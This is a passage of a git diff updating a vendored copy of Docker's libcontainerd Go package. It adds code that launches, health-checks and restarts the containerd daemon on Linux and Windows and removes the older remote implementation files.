+	pidFile := filepath.Join(r.stateDir, pidFile)
+	f, err := os.OpenFile(pidFile, os.O_RDWR, 0600)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return -1, nil
+		}
+		return -1, err
+	}
+	defer f.Close()
+
+	b := make([]byte, 8)
+	n, err := f.Read(b)
+	if err != nil && err != io.EOF {
+		return -1, err
+	}
+
+	if n > 0 {
+		pid, err := strconv.ParseUint(string(b[:n]), 10, 64)
+		if err != nil {
+			return -1, err
+		}
+		if system.IsProcessAlive(int(pid)) {
+			return int(pid), nil
+		}
+	}
+
+	return -1, nil
+}
+
+func (r *remote) getContainerdConfig() (string, error) {
+	path := filepath.Join(r.stateDir, configFile)
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0600)
+	if err != nil {
+		return "", errors.Wrapf(err, "failed to open containerd config file at %s", path)
+	}
+	defer f.Close()
+
+	enc := toml.NewEncoder(f)
+	if err = enc.Encode(r.Config); err != nil {
+		return "", errors.Wrapf(err, "failed to encode general config")
+	}
+	if err = enc.Encode(r.pluginConfs); err != nil {
+		return "", errors.Wrapf(err, "failed to encode plugin configs")
+	}
+
+	return path, nil
+}
+
+func (r *remote) startContainerd() error {
+	pid, err := r.getContainerdPid()
+	if err != nil {
+		return err
+	}
+
+	if pid != -1 {
+		r.daemonPid = pid
+		logrus.WithField("pid", pid).
+			Infof("libcontainerd: %s is still running", binaryName)
+		return nil
+	}
+
+	configFile, err := r.getContainerdConfig()
+	if err != nil {
+		return err
+	}
+
+	args := []string{"--config", configFile}
+	cmd := exec.Command(binaryName, args...)
+	// redirect containerd logs to docker logs
+	cmd.Stdout = os.Stdout
+	cmd.Stderr = os.Stderr
+	cmd.SysProcAttr = containerdSysProcAttr()
+	// clear the NOTIFY_SOCKET from the env when starting containerd
+	cmd.Env = nil
+	for _, e := range os.Environ() {
+		if !strings.HasPrefix(e, "NOTIFY_SOCKET") {
+			cmd.Env = append(cmd.Env, e)
+		}
+	}
+	if err := cmd.Start(); err != nil {
+		return err
+	}
+
+	r.daemonWaitCh = make(chan struct{})
+	go func() {
+		// Reap our child when needed
+		if err := cmd.Wait(); err != nil {
+			r.logger.WithError(err).Errorf("containerd did not exit successfully")
+		}
+		close(r.daemonWaitCh)
+	}()
+
+	r.daemonPid = cmd.Process.Pid
+
+	err = ioutil.WriteFile(filepath.Join(r.stateDir, pidFile), []byte(fmt.Sprintf("%d", r.daemonPid)), 0660)
+	if err != nil {
+		system.KillProcess(r.daemonPid)
+		return errors.Wrap(err, "libcontainerd: failed to save daemon pid to disk")
+	}
+
+	logrus.WithField("pid", r.daemonPid).
+		Infof("libcontainerd: started new %s process", binaryName)
+
+	return nil
+}
+
+func (r *remote) monitorConnection(monitor *containerd.Client) {
+	var transientFailureCount = 0
+
+	for {
+		select {
+		case <-r.shutdownContext.Done():
+			r.logger.Info("stopping healthcheck following graceful shutdown")
+			monitor.Close()
+			return
+		case <-time.After(500 * time.Millisecond):
+		}
+
+		ctx, cancel := context.WithTimeout(r.shutdownContext, healthCheckTimeout)
+		_, err := monitor.IsServing(ctx)
+		cancel()
+		if err == nil {
+			transientFailureCount = 0
+			continue
+		}
+
+		select {
+		case <-r.shutdownContext.Done():
+			r.logger.Info("stopping healthcheck following graceful shutdown")
+			monitor.Close()
+			return
+		default:
+		}
+
+		r.logger.WithError(err).WithField("binary", binaryName).Debug("daemon is not responding")
+
+		if r.daemonPid == -1 {
+			continue
+		}
+
+		transientFailureCount++
+		if transientFailureCount < maxConnectionRetryCount || system.IsProcessAlive(r.daemonPid) {
+			continue
+		}
+
+		transientFailureCount = 0
+		if system.IsProcessAlive(r.daemonPid) {
+			r.logger.WithField("pid", r.daemonPid).Info("killing and restarting containerd")
+			// Try to get a stack trace
+			syscall.Kill(r.daemonPid, syscall.SIGUSR1)
+			<-time.After(100 * time.Millisecond)
+			system.KillProcess(r.daemonPid)
+		}
+		if r.daemonWaitCh != nil {
+			<-r.daemonWaitCh
+		}
+
+		os.Remove(r.GRPC.Address)
+		if err := r.startContainerd(); err != nil {
+			r.logger.WithError(err).Error("failed restarting containerd")
+			continue
+		}
+
+		if err := monitor.Reconnect(); err != nil {
+			r.logger.WithError(err).Error("failed connect to containerd")
+			continue
+		}
+
+		var wg sync.WaitGroup
+
+		for _, c := range r.clients {
+			wg.Add(1)
+
+			go func(c *client) {
+				defer wg.Done()
+				c.logger.WithField("namespace", c.namespace).Debug("creating new containerd remote client")
+				if err := c.reconnect(); err != nil {
+					r.logger.WithError(err).Error("failed to connect to containerd")
+					// TODO: Better way to handle this?
+					// This *shouldn't* happen, but this could wind up where the daemon
+					// is not able to communicate with an eventually up containerd
+				}
+			}(c)
+
+			wg.Wait()
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go
new file mode 100644
index 0000000000..dc59eb8c14
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_linux.go
@@ -0,0 +1,61 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"os"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/containerd/containerd/defaults"
+	"github.com/docker/docker/pkg/system"
+)
+
+const (
+	sockFile      = "docker-containerd.sock"
+	debugSockFile = "docker-containerd-debug.sock"
+)
+
+func (r *remote) setDefaults() {
+	if r.GRPC.Address == "" {
+		r.GRPC.Address = filepath.Join(r.stateDir, sockFile)
+	}
+	if r.GRPC.MaxRecvMsgSize == 0 {
+		r.GRPC.MaxRecvMsgSize = defaults.DefaultMaxRecvMsgSize
+	}
+	if r.GRPC.MaxSendMsgSize == 0 {
+		r.GRPC.MaxSendMsgSize = defaults.DefaultMaxSendMsgSize
+	}
+	if r.Debug.Address == "" {
+		r.Debug.Address = filepath.Join(r.stateDir, debugSockFile)
+	}
+	if r.Debug.Level == "" {
+		r.Debug.Level = "info"
+	}
+	if r.OOMScore == 0 {
+		r.OOMScore = -999
+	}
+	if r.snapshotter == "" {
+		r.snapshotter = "overlay"
+	}
+}
+
+func (r *remote) stopDaemon() {
+	// Ask the daemon to quit
+	syscall.Kill(r.daemonPid, syscall.SIGTERM)
+	// Wait up to 15secs for it to stop
+	for i := time.Duration(0); i < shutdownTimeout; i += time.Second {
+		if !system.IsProcessAlive(r.daemonPid) {
+			break
+		}
+		time.Sleep(time.Second)
+	}
+
+	if system.IsProcessAlive(r.daemonPid) {
+		r.logger.WithField("pid", r.daemonPid).Warn("daemon didn't stop within 15 secs, killing it")
+		syscall.Kill(r.daemonPid, syscall.SIGKILL)
+	}
+}
+
+func (r *remote) platformCleanup() {
+	os.Remove(filepath.Join(r.stateDir, sockFile))
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go
new file mode 100644
index 0000000000..d40e4c0c42
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options.go
@@ -0,0 +1,141 @@
+// +build !windows
+
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import "fmt"
+
+// WithRemoteAddr sets the external containerd socket to connect to.
+func WithRemoteAddr(addr string) RemoteOption {
+	return rpcAddr(addr)
+}
+
+type rpcAddr string
+
+func (a rpcAddr) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.GRPC.Address = string(a)
+		return nil
+	}
+	return fmt.Errorf("WithRemoteAddr option not supported for this remote")
+}
+
+// WithRemoteAddrUser sets the uid and gid to create the RPC address with
+func WithRemoteAddrUser(uid, gid int) RemoteOption {
+	return rpcUser{uid, gid}
+}
+
+type rpcUser struct {
+	uid int
+	gid int
+}
+
+func (u rpcUser) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.GRPC.UID = u.uid
+		remote.GRPC.GID = u.gid
+		return nil
+	}
+	return fmt.Errorf("WithRemoteAddr option not supported for this remote")
+}
+
+// WithStartDaemon defines if libcontainerd should also run containerd daemon.
+func WithStartDaemon(start bool) RemoteOption {
+	return startDaemon(start)
+}
+
+type startDaemon bool
+
+func (s startDaemon) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.startDaemon = bool(s)
+		return nil
+	}
+	return fmt.Errorf("WithStartDaemon option not supported for this remote")
+}
+
+// WithLogLevel defines which log level to starts containerd with.
+// This only makes sense if WithStartDaemon() was set to true.
+func WithLogLevel(lvl string) RemoteOption {
+	return logLevel(lvl)
+}
+
+type logLevel string
+
+func (l logLevel) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.Debug.Level = string(l)
+		return nil
+	}
+	return fmt.Errorf("WithDebugLog option not supported for this remote")
+}
+
+// WithDebugAddress defines at which location the debug GRPC connection
+// should be made
+func WithDebugAddress(addr string) RemoteOption {
+	return debugAddress(addr)
+}
+
+type debugAddress string
+
+func (d debugAddress) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.Debug.Address = string(d)
+		return nil
+	}
+	return fmt.Errorf("WithDebugAddress option not supported for this remote")
+}
+
+// WithMetricsAddress defines at which location the debug GRPC connection
+// should be made
+func WithMetricsAddress(addr string) RemoteOption {
+	return metricsAddress(addr)
+}
+
+type metricsAddress string
+
+func (m metricsAddress) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.Metrics.Address = string(m)
+		return nil
+	}
+	return fmt.Errorf("WithMetricsAddress option not supported for this remote")
+}
+
+// WithSnapshotter defines snapshotter driver should be used
+func WithSnapshotter(name string) RemoteOption {
+	return snapshotter(name)
+}
+
+type snapshotter string
+
+func (s snapshotter) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.snapshotter = string(s)
+		return nil
+	}
+	return fmt.Errorf("WithSnapshotter option not supported for this remote")
+}
+
+// WithPlugin allow configuring a containerd plugin
+// configuration values passed needs to be quoted if quotes are needed in
+// the toml format.
+func WithPlugin(name string, conf interface{}) RemoteOption {
+	return pluginConf{
+		name: name,
+		conf: conf,
+	}
+}
+
+type pluginConf struct {
+	// Name is the name of the plugin
+	name string
+	conf interface{}
+}
+
+func (p pluginConf) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.pluginConfs.Plugins[p.name] = p.conf
+		return nil
+	}
+	return fmt.Errorf("WithPlugin option not supported for this remote")
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go
new file mode 100644
index 0000000000..a820fb3894
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_options_linux.go
@@ -0,0 +1,18 @@
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import "fmt"
+
+// WithOOMScore defines the oom_score_adj to set for the containerd process.
+func WithOOMScore(score int) RemoteOption {
+	return oomScore(score)
+}
+
+type oomScore int
+
+func (o oomScore) Apply(r Remote) error {
+	if remote, ok := r.(*remote); ok {
+		remote.OOMScore = int(o)
+		return nil
+	}
+	return fmt.Errorf("WithOOMScore option not supported for this remote")
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go
new file mode 100644
index 0000000000..89342d7395
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_daemon_windows.go
@@ -0,0 +1,50 @@
+// +build remote_daemon
+
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"os"
+)
+
+const (
+	grpcPipeName  = `\\.\pipe\docker-containerd-containerd`
+	debugPipeName = `\\.\pipe\docker-containerd-debug`
+)
+
+func (r *remote) setDefaults() {
+	if r.GRPC.Address == "" {
+		r.GRPC.Address = grpcPipeName
+	}
+	if r.Debug.Address == "" {
+		r.Debug.Address = debugPipeName
+	}
+	if r.Debug.Level == "" {
+		r.Debug.Level = "info"
+	}
+	if r.snapshotter == "" {
+		r.snapshotter = "naive" // TODO(mlaventure): switch to "windows" once implemented
+	}
+}
+
+func (r *remote) stopDaemon() {
+	p, err := os.FindProcess(r.daemonPid)
+	if err != nil {
+		r.logger.WithField("pid", r.daemonPid).Warn("could not find daemon process")
+		return
+	}
+
+	if err = p.Kill(); err != nil {
+		r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("could not kill daemon process")
+		return
+	}
+
+	_, err = p.Wait()
+	if err != nil {
+		r.logger.WithError(err).WithField("pid", r.daemonPid).Warn("wait for daemon process")
+		return
+	}
+}
+
+func (r *remote) platformCleanup() {
+	// Nothing to do
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_local.go b/vendor/github.com/docker/docker/libcontainerd/remote_local.go
new file mode 100644
index 0000000000..8ea5198b87
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/remote_local.go
@@ -0,0 +1,59 @@
+// +build windows
+
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
+
+import (
+	"sync"
+
+	"github.com/sirupsen/logrus"
+)
+
+type remote struct {
+	sync.RWMutex
+
+	logger  *logrus.Entry
+	clients []*client
+
+	// Options
+	rootDir  string
+	stateDir string
+}
+
+// New creates a fresh instance of libcontainerd remote.
+func New(rootDir, stateDir string, options ...RemoteOption) (Remote, error) {
+	return &remote{
+		logger:   logrus.WithField("module", "libcontainerd"),
+		rootDir:  rootDir,
+		stateDir: stateDir,
+	}, nil
+}
+
+type client struct {
+	sync.Mutex
+
+	rootDir    string
+	stateDir   string
+	backend    Backend
+	logger     *logrus.Entry
+	eventQ     queue
+	containers map[string]*container
+}
+
+func (r *remote) NewClient(ns string, b Backend) (Client, error) {
+	c := &client{
+		rootDir:    r.rootDir,
+		stateDir:   r.stateDir,
+		backend:    b,
+		logger:     r.logger.WithField("namespace", ns),
+		containers: make(map[string]*container),
+	}
+	r.Lock()
+	r.clients = append(r.clients, c)
+	r.Unlock()
+
+	return c, nil
+}
+
+func (r *remote) Cleanup() {
+	// Nothing to do
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go
deleted file mode 100644
index 64a28646be..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go
+++ /dev/null
@@ -1,544 +0,0 @@
-// +build linux solaris
-
-package libcontainerd
-
-import (
-	"fmt"
-	"io"
-	"io/ioutil"
-	"log"
-	"net"
-	"os"
-	"os/exec"
-	"path/filepath"
-	goruntime "runtime"
-	"strconv"
-	"strings"
-	"sync"
-	"syscall"
-	"time"
-
-	"github.com/Sirupsen/logrus"
-	containerd "github.com/docker/containerd/api/grpc/types"
-	"github.com/docker/docker/pkg/locker"
-	sysinfo "github.com/docker/docker/pkg/system"
-	"github.com/docker/docker/utils"
-	"github.com/golang/protobuf/ptypes"
-	"github.com/golang/protobuf/ptypes/timestamp"
-	"golang.org/x/net/context"
-	"google.golang.org/grpc"
-	"google.golang.org/grpc/grpclog"
-	"google.golang.org/grpc/health/grpc_health_v1"
-	"google.golang.org/grpc/transport"
-)
-
-const (
-	maxConnectionRetryCount      = 3
-	containerdHealthCheckTimeout = 3 * time.Second
-	containerdShutdownTimeout    = 15 * time.Second
-	containerdBinary             = "docker-containerd"
-	containerdPidFilename        = "docker-containerd.pid"
-	containerdSockFilename       = "docker-containerd.sock"
-	containerdStateDir           = "containerd"
-	eventTimestampFilename       = "event.ts"
-)
-
-type remote struct {
-	sync.RWMutex
-	apiClient            containerd.APIClient
-	daemonPid            int
-	stateDir             string
-	rpcAddr              string
-	startDaemon          bool
-	closeManually        bool
-	debugLog             bool
-	rpcConn              *grpc.ClientConn
-	clients              []*client
-	eventTsPath          string
-	runtime              string
-	runtimeArgs          []string
-	daemonWaitCh         chan struct{}
-	liveRestore          bool
-	oomScore             int
-	restoreFromTimestamp *timestamp.Timestamp
-}
-
-// New creates a fresh instance of libcontainerd remote.
-func New(stateDir string, options ...RemoteOption) (_ Remote, err error) {
-	defer func() {
-		if err != nil {
-			err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err)
-		}
-	}()
-	r := &remote{
-		stateDir:    stateDir,
-		daemonPid:   -1,
-		eventTsPath: filepath.Join(stateDir, eventTimestampFilename),
-	}
-	for _, option := range options {
-		if err := option.Apply(r); err != nil {
-			return nil, err
-		}
-	}
-
-	if err := sysinfo.MkdirAll(stateDir, 0700); err != nil {
-		return nil, err
-	}
-
-	if r.rpcAddr == "" {
-		r.rpcAddr = filepath.Join(stateDir, containerdSockFilename)
-	}
-
-	if r.startDaemon {
-		if err := r.runContainerdDaemon(); err != nil {
-			return nil, err
-		}
-	}
-
-	// don't output the grpc reconnect logging
-	grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags))
-	dialOpts := append([]grpc.DialOption{grpc.WithInsecure()},
-		grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) {
-			return net.DialTimeout("unix", addr, timeout)
-		}),
-	)
-	conn, err := grpc.Dial(r.rpcAddr, dialOpts...)
-	if err != nil {
-		return nil, fmt.Errorf("error connecting to containerd: %v", err)
-	}
-
-	r.rpcConn = conn
-	r.apiClient = containerd.NewAPIClient(conn)
-
-	// Get the timestamp to restore from
-	t := r.getLastEventTimestamp()
-	tsp, err := ptypes.TimestampProto(t)
-	if err != nil {
-		logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err)
-	}
-	r.restoreFromTimestamp = tsp
-
-	go r.handleConnectionChange()
-
-	if err := r.startEventsMonitor(); err != nil {
-		return nil, err
-	}
-
-	return r, nil
-}
-
-func (r *remote) UpdateOptions(options ...RemoteOption) error {
-	for _, option := range options {
-		if err := option.Apply(r); err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-func (r *remote) handleConnectionChange() {
-	var transientFailureCount = 0
-
-	ticker := time.NewTicker(500 * time.Millisecond)
-	defer ticker.Stop()
-	healthClient := grpc_health_v1.NewHealthClient(r.rpcConn)
-
-	for {
-		<-ticker.C
-		ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout)
-		_, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{})
-		cancel()
-		if err == nil {
-			continue
-		}
-
-		logrus.Debugf("libcontainerd: containerd health check returned error: %v", err)
-
-		if r.daemonPid != -1 {
-			if strings.Contains(err.Error(), "is closing") {
-				// Well, we asked for it to stop, just return
-				return
-			}
-			// all other errors are transient
-			// Reset state to be notified of next failure
-			transientFailureCount++
-			if transientFailureCount >= maxConnectionRetryCount {
-				transientFailureCount = 0
-				if utils.IsProcessAlive(r.daemonPid) {
-					utils.KillProcess(r.daemonPid)
-				}
-				<-r.daemonWaitCh
-				if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error
-					logrus.Errorf("libcontainerd: error restarting containerd: %v", err)
-				}
-				continue
-			}
-		}
-	}
-}
-
-func (r *remote) Cleanup() {
-	if r.daemonPid == -1 {
-		return
-	}
-	r.closeManually = true
-	r.rpcConn.Close()
-	// Ask the daemon to quit
-	syscall.Kill(r.daemonPid, syscall.SIGTERM)
-
-	// Wait up to 15secs for it to stop
-	for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second {
-		if !utils.IsProcessAlive(r.daemonPid) {
-			break
-		}
-		time.Sleep(time.Second)
-	}
-
-	if utils.IsProcessAlive(r.daemonPid) {
-		logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid)
-		syscall.Kill(r.daemonPid, syscall.SIGKILL)
-	}
-
-	// cleanup some files
-	os.Remove(filepath.Join(r.stateDir, containerdPidFilename))
-	os.Remove(filepath.Join(r.stateDir, containerdSockFilename))
-}
-
-func (r *remote) Client(b Backend) (Client, error) {
-	c := &client{
-		clientCommon: clientCommon{
-			backend:    b,
-			containers: make(map[string]*container),
-			locker:     locker.New(),
-		},
-		remote:        r,
-		exitNotifiers: make(map[string]*exitNotifier),
-		liveRestore:   r.liveRestore,
-	}
-
-	r.Lock()
-	r.clients = append(r.clients, c)
-	r.Unlock()
-	return c, nil
-}
-
-func (r *remote) updateEventTimestamp(t time.Time) {
-	f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600)
-	if err != nil {
-		logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err)
-		return
-	}
-	defer f.Close()
-
-	b, err := t.MarshalText()
-	if err != nil {
-		logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err)
-		return
-	}
-
-	n, err := f.Write(b)
-	if err != nil || n != len(b) {
-		logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err)
-		f.Truncate(0)
-		return
-	}
-}
-
-func (r *remote) getLastEventTimestamp() time.Time {
-	t := time.Now()
-
-	fi, err := os.Stat(r.eventTsPath)
-	if os.IsNotExist(err) || fi.Size() == 0 {
-		return t
-	}
-
-	f, err := os.Open(r.eventTsPath)
-	if err != nil {
-		logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err)
-		return t
-	}
-	defer f.Close()
-
-	b := make([]byte, fi.Size())
-	n, err := f.Read(b)
-	if err != nil || n != len(b) {
-		logrus.Warnf("libcontainerd: Unable to read last event ts: %v", err)
-		return t
-	}
-
-	t.UnmarshalText(b)
-
-	return t
-}
-
-func (r *remote) startEventsMonitor() error {
-	// First, get past events
-	t := r.getLastEventTimestamp()
-	tsp, err := ptypes.TimestampProto(t)
-	if err != nil {
-		logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err)
-	}
-	er := &containerd.EventsRequest{
-		Timestamp: tsp,
-	}
-	events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false))
-	if err != nil {
-		return err
-	}
-	go r.handleEventStream(events)
-	return nil
-}
-
-func (r *remote) handleEventStream(events containerd.API_EventsClient) {
-	for {
-		e, err := events.Recv()
-		if err != nil {
-			if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc &&
-				r.closeManually {
-				// ignore error if grpc remote connection is closed manually
-				return
-			}
-			logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err)
-			go r.startEventsMonitor()
-			return
-		}
-
-		logrus.Debugf("libcontainerd: received containerd event: %#v", e)
-
-		var container *container
-		var c *client
-		r.RLock()
-		for _, c = range r.clients {
-			container, err = c.getContainer(e.Id)
-			if err == nil {
-				break
-			}
-		}
-		r.RUnlock()
-		if container == nil {
-			logrus.Warnf("libcontainerd: unknown container %s", e.Id)
-			continue
-		}
-
-		if err := container.handleEvent(e); err != nil {
-			logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err)
-		}
-
-		tsp, err := ptypes.Timestamp(e.Timestamp)
-		if err != nil {
-			logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err)
-			continue
-		}
-
-		r.updateEventTimestamp(tsp)
-	}
-}
-
-func (r *remote) runContainerdDaemon() error {
-	pidFilename := filepath.Join(r.stateDir, containerdPidFilename)
-	f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600)
-	if err != nil {
-		return err
-	}
-	defer f.Close()
-
-	// File exist, check if the daemon is alive
-	b := make([]byte, 8)
-	n, err := f.Read(b)
-	if err != nil && err != io.EOF {
-		return err
-	}
-
-	if n > 0 {
-		pid, err := strconv.ParseUint(string(b[:n]), 10, 64)
-		if err != nil {
-			return err
-		}
-		if utils.IsProcessAlive(int(pid)) {
-			logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid)
-			r.daemonPid = int(pid)
-			return nil
-		}
-	}
-
-	// rewind the file
-	_, err = f.Seek(0, os.SEEK_SET)
-	if err != nil {
-		return err
-	}
-
-	// Truncate it
-	err = f.Truncate(0)
-	if err != nil {
-		return err
-	}
-
-	// Start a new instance
-	args := []string{
-		"-l", fmt.Sprintf("unix://%s", r.rpcAddr),
-		"--metrics-interval=0",
-		"--start-timeout", "2m",
-		"--state-dir", filepath.Join(r.stateDir, containerdStateDir),
-	}
-	if goruntime.GOOS == "solaris" {
-		args = append(args, "--shim", "containerd-shim", "--runtime", "runc")
-	} else {
-		args = append(args, "--shim", "docker-containerd-shim")
-		if r.runtime != "" {
-			args = append(args, "--runtime")
-			args = append(args, r.runtime)
-		}
-	}
-	if r.debugLog {
-		args = append(args, "--debug")
-	}
-	if len(r.runtimeArgs) > 0 {
-		for _, v := range r.runtimeArgs {
-			args = append(args, "--runtime-args")
-			args = append(args, v)
-		}
-		logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args)
-	}
-
-	cmd := exec.Command(containerdBinary, args...)
-	// redirect containerd logs to docker logs
-	cmd.Stdout = os.Stdout
-	cmd.Stderr = os.Stderr
-	cmd.SysProcAttr = setSysProcAttr(true)
-	cmd.Env = nil
-	// clear the NOTIFY_SOCKET from the env when starting containerd
-	for _, e := range os.Environ() {
-		if !strings.HasPrefix(e, "NOTIFY_SOCKET") {
-			cmd.Env = append(cmd.Env, e)
-		}
-	}
-	if err := cmd.Start(); err != nil {
-		return err
-	}
-	logrus.Infof("libcontainerd: new containerd process, pid: %d", cmd.Process.Pid)
-	if err := setOOMScore(cmd.Process.Pid, r.oomScore); err != nil {
-		utils.KillProcess(cmd.Process.Pid)
-		return err
-	}
-	if _, err := f.WriteString(fmt.Sprintf("%d", cmd.Process.Pid)); err != nil {
-		utils.KillProcess(cmd.Process.Pid)
-		return err
-	}
-
-	r.daemonWaitCh = make(chan struct{})
-	go func() {
-		cmd.Wait()
-		close(r.daemonWaitCh)
-	}() // Reap our child when needed
-	r.daemonPid = cmd.Process.Pid
-	return nil
-}
-
-// WithRemoteAddr sets the external containerd socket to connect to.
-func WithRemoteAddr(addr string) RemoteOption {
-	return rpcAddr(addr)
-}
-
-type rpcAddr string
-
-func (a rpcAddr) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.rpcAddr = string(a)
-		return nil
-	}
-	return fmt.Errorf("WithRemoteAddr option not supported for this remote")
-}
-
-// WithRuntimePath sets the path of the runtime to be used as the
-// default by containerd
-func WithRuntimePath(rt string) RemoteOption {
-	return runtimePath(rt)
-}
-
-type runtimePath string
-
-func (rt runtimePath) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.runtime = string(rt)
-		return nil
-	}
-	return fmt.Errorf("WithRuntime option not supported for this remote")
-}
-
-// WithRuntimeArgs sets the list of runtime args passed to containerd
-func WithRuntimeArgs(args []string) RemoteOption {
-	return runtimeArgs(args)
-}
-
-type runtimeArgs []string
-
-func (rt runtimeArgs) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.runtimeArgs = rt
-		return nil
-	}
-	return fmt.Errorf("WithRuntimeArgs option not supported for this remote")
-}
-
-// WithStartDaemon defines if libcontainerd should also run containerd daemon.
-func WithStartDaemon(start bool) RemoteOption {
-	return startDaemon(start)
-}
-
-type startDaemon bool
-
-func (s startDaemon) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.startDaemon = bool(s)
-		return nil
-	}
-	return fmt.Errorf("WithStartDaemon option not supported for this remote")
-}
-
-// WithDebugLog defines if containerd debug logs will be enabled for daemon.
-func WithDebugLog(debug bool) RemoteOption {
-	return debugLog(debug)
-}
-
-type debugLog bool
-
-func (d debugLog) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.debugLog = bool(d)
-		return nil
-	}
-	return fmt.Errorf("WithDebugLog option not supported for this remote")
-}
-
-// WithLiveRestore defines if containers are stopped on shutdown or restored.
-func WithLiveRestore(v bool) RemoteOption {
-	return liveRestore(v)
-}
-
-type liveRestore bool
-
-func (l liveRestore) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.liveRestore = bool(l)
-		for _, c := range remote.clients {
-			c.liveRestore = bool(l)
-		}
-		return nil
-	}
-	return fmt.Errorf("WithLiveRestore option not supported for this remote")
-}
-
-// WithOOMScore defines the oom_score_adj to set for the containerd process.
-func WithOOMScore(score int) RemoteOption {
-	return oomScore(score)
-}
-
-type oomScore int
-
-func (o oomScore) Apply(r Remote) error {
-	if remote, ok := r.(*remote); ok {
-		remote.oomScore = int(o)
-		return nil
-	}
-	return fmt.Errorf("WithOOMScore option not supported for this remote")
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go b/vendor/github.com/docker/docker/libcontainerd/remote_windows.go
deleted file mode 100644
index 74c10447bb..0000000000
--- a/vendor/github.com/docker/docker/libcontainerd/remote_windows.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package libcontainerd
-
-import "github.com/docker/docker/pkg/locker"
-
-type remote struct {
-}
-
-func (r *remote) Client(b Backend) (Client, error) {
-	c := &client{
-		clientCommon: clientCommon{
-			backend:    b,
-			containers: make(map[string]*container),
-			locker:     locker.New(),
-		},
-	}
-	return c, nil
-}
-
-// Cleanup is a no-op on Windows. It is here to implement the interface.
-func (r *remote) Cleanup() {
-}
-
-func (r *remote) UpdateOptions(opts ...RemoteOption) error {
-	return nil
-}
-
-// New creates a fresh instance of libcontainerd remote. On Windows,
-// this is not used as there is no remote containerd process.
-func New(_ string, _ ...RemoteOption) (Remote, error) {
-	return &remote{}, nil
-}
-
-// WithLiveRestore is a noop on windows.
-func WithLiveRestore(v bool) RemoteOption {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/libcontainerd/types.go b/vendor/github.com/docker/docker/libcontainerd/types.go
index 3d981e3371..96ffbe2676 100644
--- a/vendor/github.com/docker/docker/libcontainerd/types.go
+++ b/vendor/github.com/docker/docker/libcontainerd/types.go
@@ -1,75 +1,108 @@
-package libcontainerd
+package libcontainerd // import "github.com/docker/docker/libcontainerd"
 
 import (
-	"io"
+	"context"
